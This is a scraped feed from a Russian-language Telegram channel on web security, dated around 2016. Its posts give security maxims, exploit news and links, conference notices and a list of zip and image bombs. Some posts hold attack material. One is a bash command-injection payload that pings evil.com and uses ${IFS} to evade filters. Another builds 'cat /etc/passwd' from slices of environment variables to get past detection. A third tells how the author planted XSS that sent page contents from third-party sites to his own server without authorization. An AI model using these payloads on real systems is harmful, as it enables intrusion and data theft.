Понравилось:
1. Не верьте никому и ничему.
2. Всегда предполагайте худший сценарий.
3. Применяйте многоуровневую защиту (Defence-in-Depth).
4. Придерживайтесь принципа «чем проще, тем лучше» (Keep It Simple Stupid, KISS).
5. Придерживайтесь принципа «минимальных привилегий».
6. Злоумышленники чуют неясность.
7. Читайте документацию (RTFM), но никогда ей не доверяйте.
8. Если это не тестировали, то это не работает.
9. Это всегда ваша ошибка!
1. Не верьте никому и ничему.
2. Всегда предполагайте худший сценарий.
3. Применяйте многоуровневую защиту (Defence-in-Depth).
4. Придерживайтесь принципа «чем проще, тем лучше» (Keep It Simple Stupid, KISS).
5. Придерживайтесь принципа «минимальных привилегий».
6. Злоумышленники чуют неясность.
7. Читайте документацию (RTFM), но никогда ей не доверяйте.
8. Если это не тестировали, то это не работает.
9. Это всегда ваша ошибка!
1
А может тут полноценный бложек завести?
anonymous poll
Давай! Флуди, пиши мнения, мне норм – 197
👍👍👍👍👍👍👍 75%
Лучше коротко и по существу – 64
👍👍 25%
👥 261 people voted so far.
anonymous poll
Давай! Флуди, пиши мнения, мне норм – 197
👍👍👍👍👍👍👍 75%
Лучше коротко и по существу – 64
👍👍 25%
👥 261 people voted so far.
Держи RCE вектор:
При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда
&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&'\"`0&$(ping${IFS}-c1${IFS}evil.com)&ping -c1 evil.com&`'При недостаточной фильтрации пользовательских данных, которые попадают в bash интерпритатор, выполнится команда
ping -c evil.com. На случай экранирования пробелов можно использовать ${IFS} - это пустая строка.1
Забавный эксплойт для повышения привлегий до суперпользователя в Tomcat (на Debian).
https://vulners.com/exploitdb/EDB-ID:40450
https://vulners.com/exploitdb/EDB-ID:40450
Vulners Database
CVE-2016-1240 - vulnerability database | Vulners.com
The Tomcat init noscript in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-ja...
OWASP Russia Meetup в Яндексе, в следующую среду.
Доклады:
[*] Web application firewalls: анализ логики обнаружения атак
[*] Безопасность TLS в роще доменов
[*] Software development lifecycle: финальный аудит безопасности и его автоматизация
https://events.yandex.ru/events/yagosti/12-oct-2016/
Доклады:
[*] Web application firewalls: анализ логики обнаружения атак
[*] Безопасность TLS в роще доменов
[*] Software development lifecycle: финальный аудит безопасности и его автоматизация
https://events.yandex.ru/events/yagosti/12-oct-2016/
❤🔥1
Не умеют парсить.
Сунул я как-то XSS вектор в статус instagram, без повода и цели - смотрю, а XSS срабатывает. Начал отправлять себе на сервер содержимое окна, текущий урл, получился такой вот сниффер. Так вот, XSS сработали на:
- findgram.me
- imgrab.com
- instagy.com
- iconosquare.com
- tofo.me
- photo.sh
- gramosphere.com
Что за сервисы я не сильно представляю, но с фильтрацией пользовательских данных у них не очень.
Сунул я как-то XSS вектор в статус instagram, без повода и цели - смотрю, а XSS срабатывает. Начал отправлять себе на сервер содержимое окна, текущий урл, получился такой вот сниффер. Так вот, XSS сработали на:
- findgram.me
- imgrab.com
- instagy.com
- iconosquare.com
- tofo.me
- photo.sh
- gramosphere.com
Что за сервисы я не сильно представляю, но с фильтрацией пользовательских данных у них не очень.
🔥1
Forwarded from Hacker News
За большинством кибератак стоят дети и мошенники, а не государство
https://goo.gl/Wyr8JG
https://goo.gl/Wyr8JG
SecurityLab.ru
За большинством кибератак стоят дети и мошенники, а не государство
Государственные хакеры стали такой же выдуманной причиной, как «извините, мое домашнее задание съела собака».
И ещё о bash.
Из переменных (и не только) можно склеивать команды, тем самым можно обойти системы обнаружения и фильты (ну мало ли).
Например, переменная
вернет
Обращаясь к переменным, в таком представлении, можно вернуть один или несколько символов (первое после двоеточия число - начальное значение символа, вторая цифра - количество символов)
вернет
Подобным образом можно собрать полноценную команду, склеивая кусочки переменных
что будет интерпретировано как
Ну или даже так:
Из переменных (и не только) можно склеивать команды, тем самым можно обойти системы обнаружения и фильты (ну мало ли).
Например, переменная
COMP_WORDBREAKS — набор символов рассматриваемые как разделители слов.echo $COMP_WORDBREAKSвернет
"'><=;|&(:Обращаясь к переменным, в таком представлении, можно вернуть один или несколько символов (первое после двоеточия число - начальное значение символа, вторая цифра - количество символов)
echo ${COMP_WORDBREAKS:11:2}вернет
(:Подобным образом можно собрать полноценную команду, склеивая кусочки переменных
cat${COMP_WORDBREAKS:0:1}${PATH:0:1}etc${HOME:0:1}passwdчто будет интерпретировано как
cat /etc/passwdНу или даже так:
${SHELLOPTS:3:1}at ${PATH:0:1}${SHELLOPTS:4:1}t${SHELLOPTS:3:1}${HOME:0:1}p${SHELLOPTS:2:1}sswd1
Кстати, тот самый доклад Владимира Иванова, о котором я говорю в описании своего доклада :)
https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf
Версия на русском:
https://youtu.be/50Sv1_nsjnE?t=9m37s
https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf
Версия на русском:
https://youtu.be/50Sv1_nsjnE?t=9m37s
❤🔥1
Вышел новый ядерный эксплойт повышения привелегий до суперпользователя в linux, в том числе под свежие ядра, использует race condition, а именуется грязной скотиной
https://dirtycow.ninja
https://dirtycow.ninja
dirtycow.ninja
Dirty COW (CVE-2016-5195)
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel.
❤🔥1
Сегодня часть интернета не работает. Не удивляйтесь, если твиттер или гитхаб не откроется.
http://thehackernews.com/2016/10/dyn-dns-ddos.html
http://thehackernews.com/2016/10/dyn-dns-ddos.html
The Hacker News
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
DDoS attack against the popular DNS service provider Dyn caused major outages to popular sites, including Twitter, Reddit, Github and Spotify.
❤🔥1
А если ты очень хочешь на ZeroNights, но внутренний еврей не позволяет тебе заплатить - го в волонтёры!
https://2016.zeronights.ru/news/zeronights-priglashaet-volonterov/
А ещё билет можно выиграть в hackquest'е
https://2016.zeronights.ru/news/vnimanie-skoro-zapuskaem-hackquest/
https://2016.zeronights.ru/news/zeronights-priglashaet-volonterov/
А ещё билет можно выиграть в hackquest'е
https://2016.zeronights.ru/news/vnimanie-skoro-zapuskaem-hackquest/
❤🔥1
Слышали про CVE-2016-8869 и CVE-2016-8870 в joomla?
А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл.
https://github.com/XiphosResearch/exploits/tree/master/Joomraa
А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл.
https://github.com/XiphosResearch/exploits/tree/master/Joomraa
GitHub
exploits/Joomraa at master · XiphosResearch/exploits
Miscellaneous exploit code. Contribute to XiphosResearch/exploits development by creating an account on GitHub.
❤🔥1
Кавычка
Слышали про CVE-2016-8869 и CVE-2016-8870 в joomla? А вот и рабочий эксплойт под joomla подъехал - создается администратор и заливается веб-шелл. https://github.com/XiphosResearch/exploits/tree/master/Joomraa
А все из-за того, что расширение pht может интерпритироваться также как php, php7, phtml, etc :)
https://telegram.me/bo0om_ru/45
https://telegram.me/bo0om_ru/45
Telegram
Bo0oM (канал)
Недавно наткнулся на расширение файла php7.
http://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
http://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
❤🔥1
В сети появился эксплойт под MySQL / MariaDB / PerconaDB - поднятие привелегий до root'а (опять race condition, ога).
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
https://www.exploit-db.com/exploits/40679/
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
https://www.exploit-db.com/exploits/40679/
❤🔥1
А как насчёт бомб? Приготовил небольшой сборник:
42.zip - классическая zip-бомба, занимающая в сжатом виде 42 килобайта, при постоянной распаковке, пока набор данных не достигнет верхнего предела распаковки в 4.3 гигабайта, будет занимать в памяти более 4.5 петабайт
r.zip - другой вариант zip-бомбы, с 1 директорией и архивом внутри
r.gz и r.tar.gz - аналогичные gzip-бомбы
droste.zip - zip архив который содержит изображение (чуть меньше 14 кб) и сам себя
spark.png.bz2 (420 байт) и распакованный spark.png - разжимается в изображение 225000х225000 пикcелей, который займет 141,4 ГБ в памяти
42.zip - классическая zip-бомба, занимающая в сжатом виде 42 килобайта, при постоянной распаковке, пока набор данных не достигнет верхнего предела распаковки в 4.3 гигабайта, будет занимать в памяти более 4.5 петабайт
r.zip - другой вариант zip-бомбы, с 1 директорией и архивом внутри
r.gz и r.tar.gz - аналогичные gzip-бомбы
droste.zip - zip архив который содержит изображение (чуть меньше 14 кб) и сам себя
spark.png.bz2 (420 байт) и распакованный spark.png - разжимается в изображение 225000х225000 пикcелей, который займет 141,4 ГБ в памяти
1